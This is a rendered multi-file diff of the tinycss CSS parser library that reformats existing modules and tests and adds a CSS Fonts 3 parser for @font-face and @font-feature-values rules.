from __future__ import unicode_literals, division
from __future__ import division, unicode_literals
import collections
import itertools
import re

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.css21
-------------
@ -11,13 +11,15 @@
"""
from __future__ import unicode_literals
from itertools import chain, islice
from .decoding import decode
from .parsing import (
ParseError, remove_whitespace, split_on_comma, strip_whitespace,
validate_any, validate_value)
from .token_data import TokenList
from .tokenizer import tokenize_grouped
from .parsing import (strip_whitespace, remove_whitespace, split_on_comma,
validate_value, validate_block, validate_any, ParseError)
# stylesheet : [ CDO | CDC | S | statement ]*;
@ -293,7 +295,6 @@ class ImportRule(object):
' {0.uri}>'.format(self))
def _remove_at_charset(tokens):
"""Remove any valid @charset at the beginning of a token stream.
@ -307,8 +308,8 @@ def _remove_at_charset(tokens):
header = list(islice(tokens, 4))
if [t.type for t in header] == ['ATKEYWORD', 'S', 'STRING', ';']:
atkw, space, string, semicolon = header
if ((atkw.value, space.value) == ('@charset', ' ')
and string.as_css()[0] == '"'):
if ((atkw.value, space.value) == ('@charset', ' ') and
string.as_css()[0] == '"'):
# Found a valid @charset rule, only keep what's after it.
return tokens
return chain(header, tokens)
@ -331,7 +332,7 @@ class CSS21Parser(object):
# User API:
def parse_stylesheet_file(self, css_file, protocol_encoding=None,
linking_encoding=None, document_encoding=None):
linking_encoding=None, document_encoding=None):
"""Parse a stylesheet from a file or filename.
Character encoding-related parameters and behavior are the same
@ -482,8 +483,6 @@ class CSS21Parser(object):
return AtRule(at_keyword, head, body,
at_keyword_token.line, at_keyword_token.column)
at_page_allowed_contexts = ['stylesheet']
def parse_at_rule(self, rule, previous_rules, errors, context):
"""Parse an at-rule.
@ -510,12 +509,13 @@ class CSS21Parser(object):
"""
if rule.at_keyword == '@page':
if context not in self.at_page_allowed_contexts:
if context != 'stylesheet':
raise ParseError(rule, '@page rule not allowed in ' + context)
selector, specificity = self.parse_page_selector(rule.head)
if rule.body is None:
raise ParseError(rule,
'invalid {0} rule: missing block'.format(rule.at_keyword))
raise ParseError(
rule, 'invalid {0} rule: missing block'.format(
rule.at_keyword))
declarations, at_rules, rule_errors = \
self.parse_declarations_and_at_rules(rule.body, '@page')
errors.extend(rule_errors)
@ -529,32 +529,34 @@ class CSS21Parser(object):
raise ParseError(rule, 'expected media types for @media')
media = self.parse_media(rule.head)
if rule.body is None:
raise ParseError(rule,
'invalid {0} rule: missing block'.format(rule.at_keyword))
raise ParseError(
rule, 'invalid {0} rule: missing block'.format(
rule.at_keyword))
rules, rule_errors = self.parse_rules(rule.body, '@media')
errors.extend(rule_errors)
return MediaRule(media, rules, rule.line, rule.column)
elif rule.at_keyword == '@import':
if context != 'stylesheet':
raise ParseError(rule,
'@import rule not allowed in ' + context)
raise ParseError(
rule, '@import rule not allowed in ' + context)
for previous_rule in previous_rules:
if previous_rule.at_keyword not in ('@charset', '@import'):
if previous_rule.at_keyword:
type_ = 'an {0} rule'.format(previous_rule.at_keyword)
else:
type_ = 'a ruleset'
raise ParseError(previous_rule,
raise ParseError(
previous_rule,
'@import rule not allowed after ' + type_)
head = rule.head
if not head:
raise ParseError(rule,
'expected URI or STRING for @import rule')
raise ParseError(
rule, 'expected URI or STRING for @import rule')
if head[0].type not in ('URI', 'STRING'):
raise ParseError(rule,
'expected URI or STRING for @import rule, got '
+ head[0].type)
raise ParseError(
rule, 'expected URI or STRING for @import rule, got ' +
head[0].type)
uri = head[0].value
media = self.parse_media(strip_whitespace(head[1:]))
if rule.body is not None:
@ -567,8 +569,9 @@ class CSS21Parser(object):
raise ParseError(rule, 'mis-placed or malformed @charset rule')
else:
raise ParseError(rule, 'unknown at-rule in {0} context: {1}'
.format(context, rule.at_keyword))
raise ParseError(
rule, 'unknown at-rule in {0} context: {1}'.format(
context, rule.at_keyword))
def parse_media(self, tokens):
"""For CSS 2.1, parse a list of media types.
@ -590,8 +593,9 @@ class CSS21Parser(object):
if types == ['IDENT']:
media_types.append(part[0].value)
else:
raise ParseError(tokens[0], 'expected a media type'
+ ((', got ' + ', '.join(types)) if types else ''))
raise ParseError(
tokens[0], 'expected a media type' +
((', got ' + ', '.join(types)) if types else ''))
return media_types
def parse_page_selector(self, tokens):
@ -609,8 +613,8 @@ class CSS21Parser(object):
"""
if not tokens:
return None, (0, 0)
if (len(tokens) == 2 and tokens[0].type == ':'
and tokens[1].type == 'IDENT'):
if (len(tokens) == 2 and tokens[0].type == ':' and
tokens[1].type == 'IDENT'):
pseudo_class = tokens[1].value
specificity = {
'first': (1, 0), 'left': (0, 1), 'right': (0, 1),
@ -679,8 +683,9 @@ class CSS21Parser(object):
for one ruleset.
:return:
a tuple of a :class:`RuleSet` and an error list.
The errors are recovered :class:`~.parsing.ParseError` in declarations.
(Parsing continues from the next declaration on such errors.)
The errors are recovered :class:`~.parsing.ParseError` in
declarations. (Parsing continues from the next declaration on such
errors.)
:raises:
:class:`~.parsing.ParseError` if the selector is invalid for the
core grammar.
@ -767,8 +772,9 @@ class CSS21Parser(object):
# CSS syntax is case-insensitive
property_name = name_token.value.lower()
else:
raise ParseError(name_token,
'expected a property name, got {0}'.format(name_token.type))
raise ParseError(
name_token, 'expected a property name, got {0}'.format(
name_token.type))
token = name_token # In case ``tokens`` is now empty
for token in tokens:

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.decoding
----------------
@ -12,11 +12,9 @@
from __future__ import unicode_literals
from binascii import unhexlify
import operator
import re
import sys
from binascii import unhexlify
__all__ = ['decode'] # Everything else is implementation detail
@ -116,101 +114,101 @@ Slice = Slicer()
ENCODING_MAGIC_NUMBERS = [
((Slice[:], ''), re.compile(
hex2re('EF BB BF 40 63 68 61 72 73 65 74 20 22')
+ b'([^\x22]*?)'
+ hex2re('22 3B')).match),
hex2re('EF BB BF 40 63 68 61 72 73 65 74 20 22') +
b'([^\x22]*?)' +
hex2re('22 3B')).match),
('UTF-8', re.compile(
hex2re('EF BB BF')).match),
((Slice[:], ''), re.compile(
hex2re('40 63 68 61 72 73 65 74 20 22')
+ b'([^\x22]*?)'
+ hex2re('22 3B')).match),
hex2re('40 63 68 61 72 73 65 74 20 22') +
b'([^\x22]*?)' +
hex2re('22 3B')).match),
((Slice[1::2], '-BE'), re.compile(
hex2re('FE FF 00 40 00 63 00 68 00 61 00 72 00 73 00 65 00'
'74 00 20 00 22')
+ b'((\x00[^\x22])*?)'
+ hex2re('00 22 00 3B')).match),
'74 00 20 00 22') +
b'((\x00[^\x22])*?)' +
hex2re('00 22 00 3B')).match),
((Slice[1::2], '-BE'), re.compile(
hex2re('00 40 00 63 00 68 00 61 00 72 00 73 00 65 00 74 00'
'20 00 22')
+ b'((\x00[^\x22])*?)'
+ hex2re('00 22 00 3B')).match),
'20 00 22') +
b'((\x00[^\x22])*?)' +
hex2re('00 22 00 3B')).match),
((Slice[::2], '-LE'), re.compile(
hex2re('FF FE 40 00 63 00 68 00 61 00 72 00 73 00 65 00 74'
'00 20 00 22 00')
+ b'(([^\x22]\x00)*?)'
+ hex2re('22 00 3B 00')).match),
'00 20 00 22 00') +
b'(([^\x22]\x00)*?)' +
hex2re('22 00 3B 00')).match),
((Slice[::2], '-LE'), re.compile(
hex2re('40 00 63 00 68 00 61 00 72 00 73 00 65 00 74 00 20'
'00 22 00')
+ b'(([^\x22]\x00)*?)'
+ hex2re('22 00 3B 00')).match),
'00 22 00') +
b'(([^\x22]\x00)*?)' +
hex2re('22 00 3B 00')).match),
((Slice[3::4], '-BE'), re.compile(
hex2re('00 00 FE FF 00 00 00 40 00 00 00 63 00 00 00 68 00'
'00 00 61 00 00 00 72 00 00 00 73 00 00 00 65 00 00'
'00 74 00 00 00 20 00 00 00 22')
+ b'((\x00\x00\x00[^\x22])*?)'
+ hex2re('00 00 00 22 00 00 00 3B')).match),
'00 74 00 00 00 20 00 00 00 22') +
b'((\x00\x00\x00[^\x22])*?)' +
hex2re('00 00 00 22 00 00 00 3B')).match),
((Slice[3::4], '-BE'), re.compile(
hex2re('00 00 00 40 00 00 00 63 00 00 00 68 00 00 00 61 00'
'00 00 72 00 00 00 73 00 00 00 65 00 00 00 74 00 00'
'00 20 00 00 00 22')
+ b'((\x00\x00\x00[^\x22])*?)'
+ hex2re('00 00 00 22 00 00 00 3B')).match),
'00 20 00 00 00 22') +
b'((\x00\x00\x00[^\x22])*?)' +
hex2re('00 00 00 22 00 00 00 3B')).match),
# Python does not support 2143 or 3412 endianness, AFAIK.
# I guess we could fix it up ourselves but meh. Patches welcome.
# Python does not support 2143 or 3412 endianness, AFAIK.
# I guess we could fix it up ourselves but meh. Patches welcome.
# ((Slice[2::4], '-2143'), re.compile(
# hex2re('00 00 FF FE 00 00 40 00 00 00 63 00 00 00 68 00 00'
# '00 61 00 00 00 72 00 00 00 73 00 00 00 65 00 00 00'
# '74 00 00 00 20 00 00 00 22 00')
# + b'((\x00\x00[^\x22]\x00)*?)'
# + hex2re('00 00 22 00 00 00 3B 00')).match),
# ((Slice[2::4], '-2143'), re.compile(
# hex2re('00 00 FF FE 00 00 40 00 00 00 63 00 00 00 68 00 00'
# '00 61 00 00 00 72 00 00 00 73 00 00 00 65 00 00 00'
# '74 00 00 00 20 00 00 00 22 00') +
# b'((\x00\x00[^\x22]\x00)*?)' +
# hex2re('00 00 22 00 00 00 3B 00')).match),
# ((Slice[2::4], '-2143'), re.compile(
# hex2re('00 00 40 00 00 00 63 00 00 00 68 00 00 00 61 00 00'
# '00 72 00 00 00 73 00 00 00 65 00 00 00 74 00 00 00'
# '20 00 00 00 22 00')
# + b'((\x00\x00[^\x22]\x00)*?)'
# + hex2re('00 00 22 00 00 00 3B 00')).match),
# ((Slice[2::4], '-2143'), re.compile(
# hex2re('00 00 40 00 00 00 63 00 00 00 68 00 00 00 61 00 00'
# '00 72 00 00 00 73 00 00 00 65 00 00 00 74 00 00 00'
# '20 00 00 00 22 00') +
# b'((\x00\x00[^\x22]\x00)*?)' +
# hex2re('00 00 22 00 00 00 3B 00')).match),
# ((Slice[1::4], '-3412'), re.compile(
# hex2re('FE FF 00 00 00 40 00 00 00 63 00 00 00 68 00 00 00'
# '61 00 00 00 72 00 00 00 73 00 00 00 65 00 00 00 74'
# '00 00 00 20 00 00 00 22 00 00')
# + b'((\x00[^\x22]\x00\x00)*?)'
# + hex2re('00 22 00 00 00 3B 00 00')).match),
# ((Slice[1::4], '-3412'), re.compile(
# hex2re('FE FF 00 00 00 40 00 00 00 63 00 00 00 68 00 00 00'
# '61 00 00 00 72 00 00 00 73 00 00 00 65 00 00 00 74'
# '00 00 00 20 00 00 00 22 00 00') +
# b'((\x00[^\x22]\x00\x00)*?)' +
# hex2re('00 22 00 00 00 3B 00 00')).match),
# ((Slice[1::4], '-3412'), re.compile(
# hex2re('00 40 00 00 00 63 00 00 00 68 00 00 00 61 00 00 00'
# '72 00 00 00 73 00 00 00 65 00 00 00 74 00 00 00 20'
# '00 00 00 22 00 00')
# + b'((\x00[^\x22]\x00\x00)*?)'
# + hex2re('00 22 00 00 00 3B 00 00')).match),
# ((Slice[1::4], '-3412'), re.compile(
# hex2re('00 40 00 00 00 63 00 00 00 68 00 00 00 61 00 00 00'
# '72 00 00 00 73 00 00 00 65 00 00 00 74 00 00 00 20'
# '00 00 00 22 00 00') +
# b'((\x00[^\x22]\x00\x00)*?)' +
# hex2re('00 22 00 00 00 3B 00 00')).match),
((Slice[::4], '-LE'), re.compile(
hex2re('FF FE 00 00 40 00 00 00 63 00 00 00 68 00 00 00 61'
'00 00 00 72 00 00 00 73 00 00 00 65 00 00 00 74 00'
'00 00 20 00 00 00 22 00 00 00')
+ b'(([^\x22]\x00\x00\x00)*?)'
+ hex2re('22 00 00 00 3B 00 00 00')).match),
'00 00 20 00 00 00 22 00 00 00') +
b'(([^\x22]\x00\x00\x00)*?)' +
hex2re('22 00 00 00 3B 00 00 00')).match),
((Slice[::4], '-LE'), re.compile(
hex2re('40 00 00 00 63 00 00 00 68 00 00 00 61 00 00 00 72'
'00 00 00 73 00 00 00 65 00 00 00 74 00 00 00 20 00'
'00 00 22 00 00 00')
+ b'(([^\x22]\x00\x00\x00)*?)'
+ hex2re('22 00 00 00 3B 00 00 00')).match),
'00 00 22 00 00 00') +
b'(([^\x22]\x00\x00\x00)*?)' +
hex2re('22 00 00 00 3B 00 00 00')).match),
('UTF-32-BE', re.compile(
hex2re('00 00 FE FF')).match),
@ -218,11 +216,11 @@ ENCODING_MAGIC_NUMBERS = [
('UTF-32-LE', re.compile(
hex2re('FF FE 00 00')).match),
# ('UTF-32-2143', re.compile(
# hex2re('00 00 FF FE')).match),
# ('UTF-32-2143', re.compile(
# hex2re('00 00 FF FE')).match),
# ('UTF-32-3412', re.compile(
# hex2re('FE FF 00 00')).match),
# ('UTF-32-3412', re.compile(
# hex2re('FE FF 00 00')).match),
('UTF-16-BE', re.compile(
hex2re('FE FF')).match),
@ -231,24 +229,24 @@ ENCODING_MAGIC_NUMBERS = [
hex2re('FF FE')).match),
# Some of there are supported by Python, but I didnt bother.
# You know the story with patches ...
# Some of there are supported by Python, but I didnt bother.
# You know the story with patches ...
# # as specified, transcoded from EBCDIC to ASCII
# ('as_specified-EBCDIC', re.compile(
# hex2re('7C 83 88 81 99 A2 85 A3 40 7F')
# + b'([^\x7F]*?)'
# + hex2re('7F 5E')).match),
# # as specified, transcoded from EBCDIC to ASCII
# ('as_specified-EBCDIC', re.compile(
# hex2re('7C 83 88 81 99 A2 85 A3 40 7F')
# + b'([^\x7F]*?)'
# + hex2re('7F 5E')).match),
# # as specified, transcoded from IBM1026 to ASCII
# ('as_specified-IBM1026', re.compile(
# hex2re('AE 83 88 81 99 A2 85 A3 40 FC')
# + b'([^\xFC]*?)'
# + hex2re('FC 5E')).match),
# # as specified, transcoded from IBM1026 to ASCII
# ('as_specified-IBM1026', re.compile(
# hex2re('AE 83 88 81 99 A2 85 A3 40 FC')
# + b'([^\xFC]*?)'
# + hex2re('FC 5E')).match),
# # as specified, transcoded from GSM 03.38 to ASCII
# ('as_specified-GSM_03.38', re.compile(
# hex2re('00 63 68 61 72 73 65 74 20 22')
# + b'([^\x22]*?)'
# + hex2re('22 3B')).match),
# # as specified, transcoded from GSM 03.38 to ASCII
# ('as_specified-GSM_03.38', re.compile(
# hex2re('00 63 68 61 72 73 65 74 20 22')
# + b'([^\x22]*?)'
# + hex2re('22 3B')).match),
]

View File

@ -0,0 +1,200 @@
# coding: utf-8
"""
tinycss.colors3
---------------
Parser for CSS 3 Fonts syntax:
https://www.w3.org/TR/css-fonts-3/
Adds support for font-face and font-feature-values rules.
:copyright: (c) 2016 by Kozea.
:license: BSD, see LICENSE for more details.
"""
from __future__ import division, unicode_literals
from .css21 import CSS21Parser, ParseError
class FontFaceRule(object):
    """Represents one parsed ``@font-face`` at-rule.

    .. attribute:: at_keyword

        Always the string ``'@font-face'``.

    .. attribute:: declarations

        The :class:`~.css21.Declaration` objects found in the rule body.

    .. attribute:: line

        Line in the source where the rule starts.

    .. attribute:: column

        Column in the source where the rule starts.

    """
    def __init__(self, at_keyword, declarations, line, column):
        # Only @font-face rules may be wrapped in this class.
        assert at_keyword == '@font-face'
        self.line = line
        self.column = column
        self.at_keyword = at_keyword
        self.declarations = declarations
class FontFeatureValuesRule(object):
    """Represents one parsed ``@font-feature-values`` at-rule.

    .. attribute:: at_keyword

        Always the string ``'@font-feature-values'``.

    .. attribute:: at_rules

        The at-rules parsed from inside the @font-feature-values block,
        kept in source order.

    .. attribute:: family_names

        The font family names this rule applies to, as a list of strings.

    .. attribute:: line

        Line in the source where the rule starts.

    .. attribute:: column

        Column in the source where the rule starts.

    """
    def __init__(self, at_keyword, at_rules, family_names, line, column):
        # Only @font-feature-values rules may be wrapped in this class.
        assert at_keyword == '@font-feature-values'
        self.line = line
        self.column = column
        self.at_keyword = at_keyword
        self.family_names = family_names
        self.at_rules = at_rules
class FontFeatureRule(object):
    """Represents one parsed font-feature at-rule nested in
    ``@font-feature-values``.

    .. attribute:: at_keyword

        One of the following strings:

        * ``@stylistic``
        * ``@styleset``
        * ``@character-variant``
        * ``@swash``
        * ``@ornaments``
        * ``@annotation``

    .. attribute:: declarations

        The :class:`~.css21.Declaration` objects found in the rule body.

    .. attribute:: line

        Line in the source where the rule starts.

    .. attribute:: column

        Column in the source where the rule starts.

    """
    def __init__(self, at_keyword, declarations, line, column):
        self.line = line
        self.column = column
        self.at_keyword = at_keyword
        self.declarations = declarations
class CSSFonts3Parser(CSS21Parser):
    """Extend :class:`~.css21.CSS21Parser` for `CSS 3 Fonts`_ syntax.

    .. _CSS 3 Fonts: https://www.w3.org/TR/css-fonts-3/

    """

    # At-keywords that are only valid nested inside an
    # @font-feature-values block.
    FONT_FEATURE_VALUES_AT_KEYWORDS = [
        '@stylistic',
        '@styleset',
        '@character-variant',
        '@swash',
        '@ornaments',
        '@annotation',
    ]

    def parse_at_rule(self, rule, previous_rules, errors, context):
        # Handle the Fonts 3 at-rules here; any other keyword is delegated
        # to the CSS 2.1 parser at the bottom of this method.
        if rule.at_keyword == '@font-face':
            # @font-face takes no selector: any token in the rule header
            # is an error.
            if rule.head:
                raise ParseError(
                    rule.head[0],
                    'unexpected {0} token in {1} rule header'.format(
                        rule.head[0].type, rule.at_keyword))
            declarations, body_errors = self.parse_declaration_list(rule.body)
            errors.extend(body_errors)
            return FontFaceRule(
                rule.at_keyword, declarations, rule.line, rule.column)
        elif rule.at_keyword == '@font-feature-values':
            # The rule header is a comma-separated list of family names.
            family_names = tuple(
                self.parse_font_feature_values_family_names(rule.head))
            # The body holds nested feature at-rules (@swash, @styleset, ...);
            # a missing body is treated as empty.
            at_rules, body_errors = (
                self.parse_rules(rule.body or [], '@font-feature-values'))
            errors.extend(body_errors)
            return FontFeatureValuesRule(
                rule.at_keyword, at_rules, family_names,
                rule.line, rule.column)
        elif rule.at_keyword in self.FONT_FEATURE_VALUES_AT_KEYWORDS:
            # Feature-value rules may only appear nested inside
            # @font-feature-values.
            if context != '@font-feature-values':
                raise ParseError(
                    rule, '{0} rule not allowed in {1}'.format(
                        rule.at_keyword, context))
            declarations, body_errors = self.parse_declaration_list(rule.body)
            errors.extend(body_errors)
            return FontFeatureRule(
                rule.at_keyword, declarations, rule.line, rule.column)
        return super(CSSFonts3Parser, self).parse_at_rule(
            rule, previous_rules, errors, context)

    def parse_font_feature_values_family_names(self, tokens):
        """Parse an @font-feature-values selector.

        :param tokens:
            An iterable of token, typically from the ``head`` attribute of
            an unparsed :class:`AtRule`.
        :returns:
            A generator of strings representing font families.
        :raises:
            :class:`~.parsing.ParseError` on invalid selectors

        """
        family = ''  # family name accumulated so far
        current_string = False  # True once a STRING token started this name
        for token in tokens:
            if token.type == 'DELIM' and token.value == ',' and family:
                # A comma terminates the current (non-empty) family name.
                yield family
                family = ''
                current_string = False
            elif token.type == 'STRING' and not family and (
                    current_string is False):
                # A quoted name is taken whole; it cannot be combined with
                # identifiers in the same name.
                family = token.value
                current_string = True
            elif token.type == 'IDENT' and not current_string:
                # Unquoted names may be several space-separated identifiers.
                if family:
                    family += ' '
                family += token.value
            elif token.type != 'S':
                # Any other non-whitespace token invalidates the selector.
                family = ''
                break
        if family:
            yield family
        else:
            # NOTE(review): if ``tokens`` is empty, ``token`` is unbound here
            # and this raises NameError rather than ParseError — confirm
            # whether an empty head can reach this point.
            raise ParseError(token, 'invalid @font-feature-values selector')

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.page3
------------------
@ -12,7 +12,8 @@
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals, division
from __future__ import division, unicode_literals
from .css21 import CSS21Parser, ParseError
@ -107,21 +108,21 @@ class CSSPage3Parser(CSS21Parser):
'@right-bottom',
]
at_page_allowed_contexts = ['stylesheet', '@media']
def parse_at_rule(self, rule, previous_rules, errors, context):
if rule.at_keyword in self.PAGE_MARGIN_AT_KEYWORDS:
if context != '@page':
raise ParseError(rule,
'%s rule not allowed in %s' % (rule.at_keyword, context))
raise ParseError(
rule, '{0} rule not allowed in {1}'.format(
rule.at_keyword, context))
if rule.head:
raise ParseError(rule.head[0],
'unexpected %s token in %s rule header'
% (rule.head[0].type, rule.at_keyword))
raise ParseError(
rule.head[0],
'unexpected {0} token in {1} rule header'.format(
rule.head[0].type, rule.at_keyword))
declarations, body_errors = self.parse_declaration_list(rule.body)
errors.extend(body_errors)
return MarginRule(rule.at_keyword, declarations,
rule.line, rule.column)
return MarginRule(
rule.at_keyword, declarations, rule.line, rule.column)
return super(CSSPage3Parser, self).parse_at_rule(
rule, previous_rules, errors, context)
@ -149,11 +150,9 @@ class CSSPage3Parser(CSS21Parser):
else:
name = None
name_specificity = (0,)
if (len(head) == 2 and head[0].type == ':'
and head[1].type == 'IDENT'):
if (len(head) == 2 and head[0].type == ':' and
head[1].type == 'IDENT'):
pseudo_class = head[1].value
# :blank is defined in GCPM:
# http://dev.w3.org/csswg/css3-gcpm/#styling-blank-pages
specificity = {
'first': (1, 0), 'blank': (1, 0),
'left': (0, 1), 'right': (0, 1),

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.parsing
---------------
@ -95,6 +95,7 @@ def validate_value(tokens):
else:
validate_any(token, 'property value')
def validate_block(tokens, context):
"""
:raises:
@ -132,8 +133,8 @@ def validate_any(token, context):
adjective = 'unmatched'
else:
adjective = 'unexpected'
raise ParseError(token,
'{0} {1} token in {2}'.format(adjective, type_, context))
raise ParseError(
token, '{0} {1} token in {2}'.format(adjective, type_, context))
class ParseError(ValueError):

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.speedups
----------------

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Test suite for tinycss
----------------------
@ -10,6 +10,14 @@
from __future__ import unicode_literals
import sys
# Awful workaround to fix isort's "sys.setdefaultencoding('utf-8')".
if sys.version_info[0] == 2:
reload(sys) # noqa
sys.setdefaultencoding('ascii')
def assert_errors(errors, expected_errors):
"""Test not complete error messages but only substrings."""

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Speed tests
-----------
@ -11,13 +11,13 @@
"""
from __future__ import unicode_literals, division
from __future__ import division, unicode_literals
import sys
import os.path
import contextlib
import timeit
import functools
import os.path
import sys
import timeit
from cssutils import parseString
@ -25,7 +25,6 @@ from .. import tokenizer
from ..css21 import CSS21Parser
from ..parsing import remove_whitespace
CSS_REPEAT = 4
TIMEIT_REPEAT = 3
TIMEIT_NUMBER = 20
@ -82,8 +81,6 @@ def parse_cssutils():
def check_consistency():
result = parse_python()
#import pprint
#pprint.pprint(result)
assert len(result) > 0
if tokenizer.cython_tokenize_flat:
assert parse_cython() == result

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for the public API
------------------------
@ -9,10 +9,8 @@
from __future__ import unicode_literals
import itertools
from pytest import raises
from tinycss import make_parser
from tinycss.page3 import CSSPage3Parser

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for the CSS 3 color parser
--------------------------------
@ -11,8 +11,7 @@
from __future__ import unicode_literals
import pytest
from tinycss.color3 import parse_color_string, hsl_to_rgb
from tinycss.color3 import hsl_to_rgb, parse_color_string
@pytest.mark.parametrize(('css_source', 'expected_result'), [
@ -172,30 +171,30 @@ def test_color(css_source, expected_result):
@pytest.mark.parametrize(('hsl', 'expected_rgb'), [
# http://en.wikipedia.org/wiki/HSL_and_HSV#Examples
((0, 0, 100 ), (1, 1, 1 )),
((127, 0, 100 ), (1, 1, 1 )),
((0, 0, 50 ), (0.5, 0.5, 0.5 )),
((127, 0, 50 ), (0.5, 0.5, 0.5 )),
((0, 0, 0 ), (0, 0, 0 )),
((127, 0, 0 ), (0, 0, 0 )),
((0, 100, 50 ), (1, 0, 0 )),
((60, 100, 37.5), (0.75, 0.75, 0 )),
((780, 100, 37.5), (0.75, 0.75, 0 )),
((-300, 100, 37.5), (0.75, 0.75, 0 )),
((120, 100, 25 ), (0, 0.5, 0 )),
((180, 100, 75 ), (0.5, 1, 1 )),
((240, 100, 75 ), (0.5, 0.5, 1 )),
((300, 50, 50 ), (0.75, 0.25, 0.75 )),
((61.8, 63.8, 39.3), (0.628, 0.643, 0.142)),
((251.1, 83.2, 51.1), (0.255, 0.104, 0.918)),
((134.9, 70.7, 39.6), (0.116, 0.675, 0.255)),
((49.5, 89.3, 49.7), (0.941, 0.785, 0.053)),
((283.7, 77.5, 54.2), (0.704, 0.187, 0.897)),
((14.3, 81.7, 62.4), (0.931, 0.463, 0.316)),
((56.9, 99.1, 76.5), (0.998, 0.974, 0.532)),
((162.4, 77.9, 44.7), (0.099, 0.795, 0.591)),
((248.3, 60.1, 37.3), (0.211, 0.149, 0.597)),
((240.5, 29, 60.7), (0.495, 0.493, 0.721)),
((0, 0, 100 ), (1, 1, 1 )), # noqa
((127, 0, 100 ), (1, 1, 1 )), # noqa
((0, 0, 50 ), (0.5, 0.5, 0.5 )), # noqa
((127, 0, 50 ), (0.5, 0.5, 0.5 )), # noqa
((0, 0, 0 ), (0, 0, 0 )), # noqa
((127, 0, 0 ), (0, 0, 0 )), # noqa
((0, 100, 50 ), (1, 0, 0 )), # noqa
((60, 100, 37.5), (0.75, 0.75, 0 )), # noqa
((780, 100, 37.5), (0.75, 0.75, 0 )), # noqa
((-300, 100, 37.5), (0.75, 0.75, 0 )), # noqa
((120, 100, 25 ), (0, 0.5, 0 )), # noqa
((180, 100, 75 ), (0.5, 1, 1 )), # noqa
((240, 100, 75 ), (0.5, 0.5, 1 )), # noqa
((300, 50, 50 ), (0.75, 0.25, 0.75 )), # noqa
((61.8, 63.8, 39.3), (0.628, 0.643, 0.142)), # noqa
((251.1, 83.2, 51.1), (0.255, 0.104, 0.918)), # noqa
((134.9, 70.7, 39.6), (0.116, 0.675, 0.255)), # noqa
((49.5, 89.3, 49.7), (0.941, 0.785, 0.053)), # noqa
((283.7, 77.5, 54.2), (0.704, 0.187, 0.897)), # noqa
((14.3, 81.7, 62.4), (0.931, 0.463, 0.316)), # noqa
((56.9, 99.1, 76.5), (0.998, 0.974, 0.532)), # noqa
((162.4, 77.9, 44.7), (0.099, 0.795, 0.591)), # noqa
((248.3, 60.1, 37.3), (0.211, 0.149, 0.597)), # noqa
((240.5, 29, 60.7), (0.495, 0.493, 0.721)), # noqa
])
def test_hsl(hsl, expected_rgb):
for got, expected in zip(hsl_to_rgb(*hsl), expected_rgb):

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for the CSS 2.1 parser
----------------------------
@ -9,16 +9,16 @@
from __future__ import unicode_literals
import io
import os
import tempfile
import pytest
from tinycss.css21 import CSS21Parser
from .test_tokenizer import jsonify
from . import assert_errors
from .test_tokenizer import jsonify
def parse_bytes(css_bytes, kwargs):
@ -49,7 +49,7 @@ def parse_filename(css_bytes, kwargs):
('@import "é";'.encode('utf8'), {}, 'é'),
('@import "é";'.encode('utf16'), {}, 'é'), # with a BOM
('@import "é";'.encode('latin1'), {}, 'é'),
('@import "£";'.encode('Shift-JIS'), {}, '\x81\x92'), # latin1 mojibake
('@import "£";'.encode('Shift-JIS'), {}, '\x81\x92'), # lat1 mojibake
('@charset "Shift-JIS";@import "£";'.encode('Shift-JIS'), {}, '£'),
(' @charset "Shift-JIS";@import "£";'.encode('Shift-JIS'), {},
'\x81\x92'),
@ -77,7 +77,8 @@ def test_bytes(css_bytes, kwargs, expected_result, parse):
('foo{} @lipsum{} bar{}', 2,
['unknown at-rule in stylesheet context: @lipsum']),
('@charset "ascii"; foo {}', 1, []),
(' @charset "ascii"; foo {}', 1, ['mis-placed or malformed @charset rule']),
(' @charset "ascii"; foo {}', 1, [
'mis-placed or malformed @charset rule']),
('@charset ascii; foo {}', 1, ['mis-placed or malformed @charset rule']),
('foo {} @charset "ascii";', 1, ['mis-placed or malformed @charset rule']),
])
@ -109,8 +110,8 @@ def test_at_rules(css_source, expected_rules, expected_errors):
('a{b:4}', [('a', [('b', [('INTEGER', 4)])])], []),
('@page {\t b: 4; @margin}', [('@page', [], [
('S', '\t '), ('IDENT', 'b'), (':', ':'), ('S', ' '), ('INTEGER', 4),
(';', ';'), ('S', ' '), ('ATKEYWORD', '@margin'),
('S', '\t '), ('IDENT', 'b'), (':', ':'), ('S', ' '), ('INTEGER', 4),
(';', ';'), ('S', ' '), ('ATKEYWORD', '@margin'),
])], []),
('foo', [], ['no declaration block found']),

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for decoding bytes to Unicode
-----------------------------------
@ -11,7 +11,6 @@
from __future__ import unicode_literals
import pytest
from tinycss.decoding import decode
@ -30,13 +29,13 @@ def params(css, encoding, use_bom=False, expect_error=False, **kwargs):
params('£', 'ShiftJIS', linking_encoding='Shift-JIS'),
params('£', 'ShiftJIS', document_encoding='Shift-JIS'),
params('£', 'ShiftJIS', protocol_encoding='utf8',
document_encoding='ShiftJIS'),
document_encoding='ShiftJIS'),
params('@charset "utf8"; £', 'ShiftJIS', expect_error=True),
params('@charset "utf£8"; £', 'ShiftJIS', expect_error=True),
params('@charset "unknown-encoding"; £', 'ShiftJIS', expect_error=True),
params('@charset "utf8"; £', 'ShiftJIS', document_encoding='ShiftJIS'),
params('£', 'ShiftJIS', linking_encoding='utf8',
document_encoding='ShiftJIS'),
document_encoding='ShiftJIS'),
params('@charset "utf-32"; 𐂃', 'utf-32-be'),
params('@charset "Shift-JIS"; £', 'ShiftJIS'),
params('@charset "ISO-8859-8"; £', 'ShiftJIS', expect_error=True),

View File

@ -0,0 +1,144 @@
# coding: utf-8
"""
Tests for the Fonts 3 parser
----------------------------
:copyright: (c) 2016 by Kozea.
